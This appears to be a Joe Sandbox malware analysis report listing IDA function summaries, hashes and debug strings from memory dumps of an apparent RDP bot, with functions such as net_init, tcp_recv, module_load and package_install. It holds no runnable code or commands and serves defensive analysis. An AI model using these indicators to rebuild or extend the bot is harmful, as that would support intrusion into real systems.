                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                    • API String ID: 1799206407-1112464793
                                                                    • Opcode ID: 3cc48ef8b18bf0d65c767a1061d8ac125db0c37b3621887fc9af1ba8ee2a1bea
                                                                    • Instruction ID: 7ba44d8a38d5cefaf94a26b534981972f27032854bd56223e93b490ac41ceac9
                                                                    • Opcode Fuzzy Hash: 3cc48ef8b18bf0d65c767a1061d8ac125db0c37b3621887fc9af1ba8ee2a1bea
                                                                    • Instruction Fuzzy Hash: D021FC60E0EC838AF7A047EA944437C124DAF01339F6445BEE1DECA1F4DE2DEE859242
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                    • API String ID: 1799206407-1112464793
                                                                    • Opcode ID: bb7ab14be6bd40bba2094a4d380e504bdcc41b778acc424642ca6a2b53163314
                                                                    • Instruction ID: 76d2fba2e5229220850bb391bd2f41615d29094f397ba301eac26d6e346e5275
                                                                    • Opcode Fuzzy Hash: bb7ab14be6bd40bba2094a4d380e504bdcc41b778acc424642ca6a2b53163314
                                                                    • Instruction Fuzzy Hash: 34218090E0D48782FB348E98A4543F82355AF00329F248532D5DFCA2FAEE1DE8859E02
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                    • API String ID: 1799206407-1112464793
                                                                    • Opcode ID: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
                                                                    • Instruction ID: 3e819a7466f0205ff97019d8a93c66e220d0151d4af050a7d4915002dbb2ad38
                                                                    • Opcode Fuzzy Hash: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
                                                                    • Instruction Fuzzy Hash: 6A219750E4C583A2FB60AADC96453BC6340AF02319F246B32F34ECA5F4CF5DF8855282
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastrecv
                                                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                    • API String ID: 2514157807-65069805
                                                                    • Opcode ID: e06e6ac3a5b737bed27b0c1f2aa3504afd0db6bad35eb42f4d1670c5dba4e5a4
                                                                    • Instruction ID: bb9c0df8e9a75dd6379b9e460f3045427795c555c4ea0916813324bf74af14da
                                                                    • Opcode Fuzzy Hash: e06e6ac3a5b737bed27b0c1f2aa3504afd0db6bad35eb42f4d1670c5dba4e5a4
                                                                    • Instruction Fuzzy Hash: 27118F64A0CD1391FB2153A7AC4067C2659AF457F0F4063B9EE3D8A6F5DF1CA9178700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastrecv
                                                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                    • API String ID: 2514157807-65069805
                                                                    • Opcode ID: 2d2e178c0c84d47958ca5a4b1444a6b03feedde3d07fdb9a944df0385b2d5f4a
                                                                    • Instruction ID: d625dcacc36634493a07f6578926aa1e619ccab117feb3266361ca09ce37cf76
                                                                    • Opcode Fuzzy Hash: 2d2e178c0c84d47958ca5a4b1444a6b03feedde3d07fdb9a944df0385b2d5f4a
                                                                    • Instruction Fuzzy Hash: D211BF94F0CD178AFA109317A8422BC1200AF717B4F4013B1E83EB66F7DE5CE9129308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastrecv
                                                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                    • API String ID: 2514157807-65069805
                                                                    • Opcode ID: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
                                                                    • Instruction ID: e56dc9eff2860ec37c974bd0888b7b1d097aeb1c1e0e716b6859889fbf120d95
                                                                    • Opcode Fuzzy Hash: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
                                                                    • Instruction Fuzzy Hash: 7E116D91E1EA0B56FA349F29A8403B81251AF407B0F508331DDAD866F1EE2CA5468B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastrecv
                                                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                    • API String ID: 2514157807-65069805
                                                                    • Opcode ID: 2769e85300a6225c4f4f4af3d49a9cda37af30217e15780f35fffe4d91a28b8b
                                                                    • Instruction ID: 0ff2bc9d7e82ad617b58cae23cba37a60044772aee02322c05e6e01a4f1ea8c7
                                                                    • Opcode Fuzzy Hash: 2769e85300a6225c4f4f4af3d49a9cda37af30217e15780f35fffe4d91a28b8b
                                                                    • Instruction Fuzzy Hash: 01114C60A0C69791F6305F28A8412F91690AF457B4E505731D8EE8B7F9FE1CEA468F40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastrecv
                                                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                    • API String ID: 2514157807-65069805
                                                                    • Opcode ID: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                                                                    • Instruction ID: a5c92822cba8179eac91608ba5b8e969db33ed80fdbc44008ac1e737e588fc2c
                                                                    • Opcode Fuzzy Hash: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                                                                    • Instruction Fuzzy Hash: E9110614F0C5D7B1F9186B58ACC42B813456F067B0F400771DCEE8A2F3DE1EA542A302
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,?,service,0000013B444313D0,00007FF6BFD69404), ref: 00007FF6BFD616A2
                                                                    • GetLastError.KERNEL32(?,?,service,0000013B444313D0,00007FF6BFD69404), ref: 00007FF6BFD616CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                                                                    • API String ID: 4085810780-4145076245
                                                                    • Opcode ID: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
                                                                    • Instruction ID: 6c04683cc9991e1514ccdc521adb4235fc0c304dbd21824c0f27a76221524e91
                                                                    • Opcode Fuzzy Hash: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
                                                                    • Instruction Fuzzy Hash: 88F0BE10B0A60391ED11A7DEA8541B437506F08FC4F481B32EF0CCA3B1EE2CA686C380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Startupfflushfwrite
                                                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                    • API String ID: 3771387389-898331216
                                                                    • Opcode ID: c90fb732901bfcef3479976ecb70827c67309f286ee6606b0b5eb548d882ae44
                                                                    • Instruction ID: 0c3c2253575d6301e7106cbe7b32b3d72bf65f32a0e624ccad0567b6f643fe6f
                                                                    • Opcode Fuzzy Hash: c90fb732901bfcef3479976ecb70827c67309f286ee6606b0b5eb548d882ae44
                                                                    • Instruction Fuzzy Hash: 6DF090A0B0AC43D1FB129B57E8447F8271BAF503A4F8454B6C80E4A1BAEF1CE549C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Startupfflushfwrite
                                                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                    • API String ID: 3771387389-898331216
                                                                    • Opcode ID: c4eed24462b8fa7fecf60d03d9b0faac7885e2a2389ba4c12e41e7cca7c8d377
                                                                    • Instruction ID: ffc3f69b6aec50ffb1ffa522c446aeca5272f00a99b3efc3ba28326d8b4a1765
                                                                    • Opcode Fuzzy Hash: c4eed24462b8fa7fecf60d03d9b0faac7885e2a2389ba4c12e41e7cca7c8d377
                                                                    • Instruction Fuzzy Hash: 59F090A2B08D07D9FB109B12E8457F85350AF347A0F8400B2E83D662B7EE1DE549D708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Startupfflushfwrite
                                                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                    • API String ID: 3771387389-898331216
                                                                    • Opcode ID: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
                                                                    • Instruction ID: 48f034637672fb6a1669f4886f288e988f552bf5d4b7ef60340667aab2f9bb19
                                                                    • Opcode Fuzzy Hash: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
                                                                    • Instruction Fuzzy Hash: CFF01DA1F1A94792FB359F18E8063F52361EF54784F44443AD98D866B6EE1CE5498F00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Startupfflushfwrite
                                                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                    • API String ID: 3771387389-898331216
                                                                    • Opcode ID: 004d0ef3957c76c15733a8feaf0c6f1d0a4dbcf718e70593778612304d9c5a7c
                                                                    • Instruction ID: 813bfe516f9d47ecb999925ea760e978530c78e5624d6b441650c672d060f070
                                                                    • Opcode Fuzzy Hash: 004d0ef3957c76c15733a8feaf0c6f1d0a4dbcf718e70593778612304d9c5a7c
                                                                    • Instruction Fuzzy Hash: AEF01D61B4D44692FB319F18F8443F523A0AF24784F844436D8CD472BAFE5DE6498F10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Startupfflushfwrite
                                                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                    • API String ID: 3771387389-898331216
                                                                    • Opcode ID: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
                                                                    • Instruction ID: 85f77d2be975b3e816289577f64e9b4e4d5e56029ebd34aeaf7d277b3652f711
                                                                    • Opcode Fuzzy Hash: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
                                                                    • Instruction Fuzzy Hash: D3F01D64B0859BB2FB189B64E8C87F42215AF223C4F440072D8CE462B7EE1EE5999342
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Startupfflushfwrite
                                                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                    • API String ID: 3771387389-898331216
                                                                    • Opcode ID: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
                                                                    • Instruction ID: 350c13c57bc2e2fdcf8d1dacd5220ec29b3317bf62508ff1e0cdfbf23a47f2db
                                                                    • Opcode Fuzzy Hash: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
                                                                    • Instruction Fuzzy Hash: 43F030A1B0D40791FB119B25E8443F523616F54BD5F544837D8ED461B6EE6DE548C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                                                                    • API String ID: 3472027048-1600310168
                                                                    • Opcode ID: 95fe71e78bf61cfc0f47fa0742824d03069bead29b5896cf44766b2ee98907d1
                                                                    • Instruction ID: 70378c1bd8b9ea470815cf204b8f55a4bcff2310c29e5b8a53800d7ed011997c
                                                                    • Opcode Fuzzy Hash: 95fe71e78bf61cfc0f47fa0742824d03069bead29b5896cf44766b2ee98907d1
                                                                    • Instruction Fuzzy Hash: FB517221E0CD4349FBB09B97E4843BE635AAF45378F5442B9D46D466F6DE2CE4458700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$HandleModule_mbscpy
                                                                    • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                                                                    • API String ID: 3656010895-1379287937
                                                                    • Opcode ID: 4b1288cd24698f13a6b3948ac59b53d7aab4a4e5bdf7d96b3b3cf1ccf810a908
                                                                    • Instruction ID: 607bdfb7dd5c785f2b7c71906b85dd0831a9079e0b498f30811d09ee8241f5fd
                                                                    • Opcode Fuzzy Hash: 4b1288cd24698f13a6b3948ac59b53d7aab4a4e5bdf7d96b3b3cf1ccf810a908
                                                                    • Instruction Fuzzy Hash: BD312F6270C687A1EB109AD8E8913EA6351EF84344F940232E74DCB6A9DE6DE909C780
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
